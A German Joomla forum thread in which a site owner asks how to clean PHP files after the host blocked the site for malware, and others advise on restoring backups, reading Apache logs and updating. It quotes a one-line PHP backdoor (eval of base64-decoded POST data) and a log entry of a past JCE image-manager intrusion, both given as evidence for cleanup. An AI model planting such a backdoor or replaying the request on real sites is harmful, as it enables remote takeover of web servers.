+ Antworten
Seite 1 von 2 1 2 LetzteLetzte
Ergebnis 1 bis 10 von 13

Thema: Schadcodes aus Dateien entfernen

  1. #1
    Neu an Board Avatar von Meezekatz
    Registriert seit
    08.02.2010
    Ort
    NRW
    Beiträge
    56
    Bedankte sich
    6
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard Schadcodes aus Dateien entfernen

    Hallo Community

    Unser Provider (Hosteurope) hat unsere Webseite gesperrt, da sich dort Schadcode befinden soll.
    Inzwischen haben wir schon einiges getan, doch ich hänge jetzt quasi am letzten Schritt und bin unsicher wie ich vorgehen soll.

    Man hat uns eine Liste der verbleibenden Dateien gesendet die noch Schadcode enthalten.
    Ich habe zunächst alle einzeln geöffnet und nur die Angabe <?php darin gefunden.
    Anschließend habe ich die Dateien in txt Dateien umbenannt und tatsächlich etwas versetzt z.B. diese Angaben entdeckt
    eval(base64_decode($_POST['n1c1ae6']));?>

    Kann / muss ich diese zusätzlichen Angaben einfach rauslöschen und so die Dateien bereinigen?
    Ganz löschen geht nicht, da die Dateien auch im Original der Joomlainstallation vorhanden sind.

    Über einen Tipp würde ich mich freuen und sage schon jetzt ganz herzlichen Dank,
    Meez
    Selig sind die mit 'nem Sprung in der Schüssel - denn der lässt Licht hindurch !

  2. #2
    Wohnt hier Avatar von JoomlaWunder
    Registriert seit
    03.03.2010
    Ort
    Nordseeküste
    Beiträge
    4.970
    Bedankte sich
    201
    Erhielt 1.272 Danksagungen
    in 1.238 Beiträgen

    Standard

    Mit einfachem Rauslöschen aus den Dateien wird es nicht funktionieren! Wer weiß, wie viele Dateien noch infiziert sind.
    Es gibt "Flottes Liste", die man bei einem Hack abarbeiten sollte. Den Link habe ich gerne nicht zur Hand -> Forumsuche

    Wichtig ist herauszubekommen, wie das passieren konnte! Ich würde alles platt machen und die letzte Sicherung einspielen, die hoffentlich sauber ist.
    Falls in dem Backup nicht alle Komponenten, Plugins ...usw. auf dem neuesten Stand sind, dann erstmal lokal bzw. auf einer Testseite alles fertig machen und dann hochladen!

    Wenn du dir unsicher bist, solltest du eventuell auf die Hilfe eines Profis vertrauen!
    Geändert von JoomlaWunder (03.09.2015 um 12:42 Uhr)
    Gruß!
    JoomlaWunder
    Kein Support per PN!
    Konnte ich helfen? -> Dann bitte den "Danke"-Button klicken!

  3. #3
    Flexheader
    Gast

    Standard

    Ich würde anders vorgehen was die Ursache angeht.

    Auch wenn Du alles neu machst, solltest Du wissen, wie es geschah. Ich werde öfter mal beauftragt, so etwas heraus zu finden und gehe so vor:

    -Änderungsdatum und Uhrzeit einer befallenen Datei notieren
    -Versuchen, die Apache Logs zu kommen
    -dort nach "POST" suchen im Änderungszeitraum

    Hier mal ein älterer Beispieleinbruch in den Imagemanager des JCE:

    Code:
    125.253.118.x- - [11/Feb/2013:00:22:39 +0100] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1 " 200 70 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre" www.blabla.de
    Anhand des "com_jce" weiss man dann: Aha, mal wieder JCE/oderwasauchimmer

    Neuaufsetzen ohne Ursachenfindung ist ja blöd, wenn Du dann das verwundbare Ding wieder installierst.

  4. #4
    Wohnt hier Avatar von JoomlaWunder
    Registriert seit
    03.03.2010
    Ort
    Nordseeküste
    Beiträge
    4.970
    Bedankte sich
    201
    Erhielt 1.272 Danksagungen
    in 1.238 Beiträgen

    Standard

    Zitat Zitat von Flexheader Beitrag anzeigen
    Ich würde anders vorgehen was die Ursache angeht. Auch wenn Du alles neu machst, solltest Du wissen, wie es geschah.
    Natürlich bekommt man über "Plattmachen" und "Sauberes Backup einspielen" nicht die Ursache heraus. War vielleicht etwas unglücklich geschrieben von mir.
    Da würde ich auch zuerst mit den logs anfangen.
    Gruß!
    JoomlaWunder
    Kein Support per PN!
    Konnte ich helfen? -> Dann bitte den "Danke"-Button klicken!

  5. #5
    War schon öfter hier Avatar von posttraumatisch
    Registriert seit
    22.07.2008
    Ort
    ganz in der Nähe
    Beiträge
    131
    Bedankte sich
    37
    Erhielt 5 Danksagungen
    in 5 Beiträgen

    Standard

    Base 64 codierter PHP Code ist für mich immer verdächtig.
    lg Mario

    Vertan sprach der Hahn und stieg von der Ente...

  6. #6
    Wohnt hier Avatar von WebWorker Berlin
    Registriert seit
    03.02.2013
    Ort
    Berlin
    Beiträge
    2.402
    Bedankte sich
    432
    Erhielt 494 Danksagungen
    in 444 Beiträgen

    Standard

    Zitat Zitat von Flexheader Beitrag anzeigen
    Ich würde anders vorgehen was die Ursache angeht.

    Auch wenn Du alles neu machst, solltest Du wissen, wie es geschah. Ich werde öfter mal beauftragt, so etwas heraus zu finden und gehe so vor:

    -Änderungsdatum und Uhrzeit einer befallenen Datei notieren
    -Versuchen, die Apache Logs zu kommen
    -dort nach "POST" suchen im Änderungszeitraum

    Hier mal ein älterer Beispieleinbruch in den Imagemanager des JCE:

    Code:
    125.253.118.x- - [11/Feb/2013:00:22:39 +0100] "POST //index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1 " 200 70 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre" www.blabla.de
    Anhand des "com_jce" weiss man dann: Aha, mal wieder JCE/oderwasauchimmer

    Neuaufsetzen ohne Ursachenfindung ist ja blöd, wenn Du dann das verwundbare Ding wieder installierst.
    Wenn es eine vernachlässigte Joomlaversion bzw JCE oder andere nicht geupdatete Erweiterung ist, wiederspreche ich hier. Denn zu 90 % ist dies der Fall und daher uninteressant dafür noch eine Bestätigung zu verlangen. kostet nur Geld und bei ner Joomlaversion 2.5.9 oder ähnlich Geldschneiderei. Entscheidend ist eine vernünftige Bereinigung und Vorbeugung für die Zukunft durch vernünftige Beratung bzw Begleitung. Das scheint ja in der Vergangenheit hier gefehlt zu haben. Wir reden hier über 2.5 .....

  7. #7
    Neu an Board Avatar von Meezekatz
    Registriert seit
    08.02.2010
    Ort
    NRW
    Beiträge
    56
    Bedankte sich
    6
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Hallo Community

    Inzwischen habe ich eine Vielzahl von Dateien angefasst und Flottes Liste abgearbeitet. Hosteurope hat alle Dateien etc immer wieder kontrolliert bis die Seite frei von Schadcodes war. Natürlich habe ich auch alle Passwörter geändert, habe alle nicht zwingend nötigen Erweiterungen entfernt und dort wo noch ein Update nötig war dieses durchgeführt. Da gab es allerdings nur 2 Punkte.
    Auch die eigenen PCs wurden nach Schadbefall untersucht, aber ohne Ergebnis.
    Die Seite wurde dann in einem komplett neuen Verzeichnis wieder hergestellt und anschließend auch freigegeben.

    So ungefähr für einen Tag. Bis die Nachricht vom Hoster kam dass es erneuten Befall gäbe. Seltsamerweise waren die dann befallenen Dateien ganz andere als vorher - also es waren ganz andere Erweiterungen betroffen (die auf neustem Stand sind).

    Hosteurope meint, dass man dies nur verhindern könne indem man Joomla auf J3 aktualisiert.
    Das Ganze habe ich nun mehrfach versucht, bin aber immer wieder an "fehlenden Tabellen" in der Datenbank gescheitert.
    Am Ende habe ich nun einen Profi angefragt diese Migration durchzuführen, da ich trotz viel Mühe hier einfach nicht weiter komme.
    Ich hoffe nun, dass nach einer Migration endlich Ruhe einkehrt. Ich kenne mehrere Seiten die problemlos seit langem mit J2.5 laufen. Nur diese eine hier bereitet ständig Probleme.
    Nun liegt meine Hoffnung auf dem Update.
    Ich bereichte, wie es sich weiter entwickelt.

    Danke für euer Interesse und die Tipps.
    Beste Grüße,
    Meez
    Selig sind die mit 'nem Sprung in der Schüssel - denn der lässt Licht hindurch !

  8. #8
    Gehört zum Inventar
    Registriert seit
    26.07.2007
    Ort
    RZ / EA / B
    Beiträge
    7.515
    Bedankte sich
    443
    Erhielt 1.763 Danksagungen
    in 1.642 Beiträgen

    Standard

    Die 2.5.28 gilt als sicher, vermutlich wurde der Schadcode nicht restlos entfernt. Ein Update auf 3.4 ist leider keine Garantie dafür, dass verbliebener Schadcode restlos entfernt wird. Ich empfehle eine Sichtprüfung der Installation durch eine Fachkraft.
    Gruß, Chris
    Joomla kaputt? Gehackt? Migration mißlungen? Datensalat?
    www.cms-reparatur.de - Soforthilfe & Webentwicklung

  9. #9
    Wohnt hier Avatar von JoomlaWunder
    Registriert seit
    03.03.2010
    Ort
    Nordseeküste
    Beiträge
    4.970
    Bedankte sich
    201
    Erhielt 1.272 Danksagungen
    in 1.238 Beiträgen

    Standard

    Ist die Website denn sehr groß? Eventuell alles neu machen und die Inhalte per c&p einfügen! Die Inhalte dabei natürlich genauestens überprüfen.
    Gruß!
    JoomlaWunder
    Kein Support per PN!
    Konnte ich helfen? -> Dann bitte den "Danke"-Button klicken!

  10. #10
    Neu an Board Avatar von Meezekatz
    Registriert seit
    08.02.2010
    Ort
    NRW
    Beiträge
    56
    Bedankte sich
    6
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    @JoomlaWunder:

    Sind schon ziemlich viele Unterseiten und viele Galerien (ist ne Seite über Oldtimer-Restaurationen). Alles komplett neu machen wäre eine Arbeit die ich ir echt nicht unbedingt machen möchte....
    Hoffe das ist zu vermeiden. Nach Angaben vom Hoster ist es nur noch ein einzelnes veraltetes Skript das die Freigabe verhindert. Allerdings finde ich mit meinen Mitteln nicht welches das noch sein soll.
    Habe um eine Angabe dazu gebeten. Dann sollte aller Schadcode entfernt und die Seite nach allen Vorgaben hier aus dem Forum sauber sein.
    Anschließend ein Backup und dann hoffentlich als Abschluss die Migration auf J3. Auch da warte ich wie beschrieben noch auf Rückmeldung der Profis

    Beste Grüße lasse ich da,
    Meez
    Selig sind die mit 'nem Sprung in der Schüssel - denn der lässt Licht hindurch !

+ Antworten
Seite 1 von 2 1 2 LetzteLetzte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein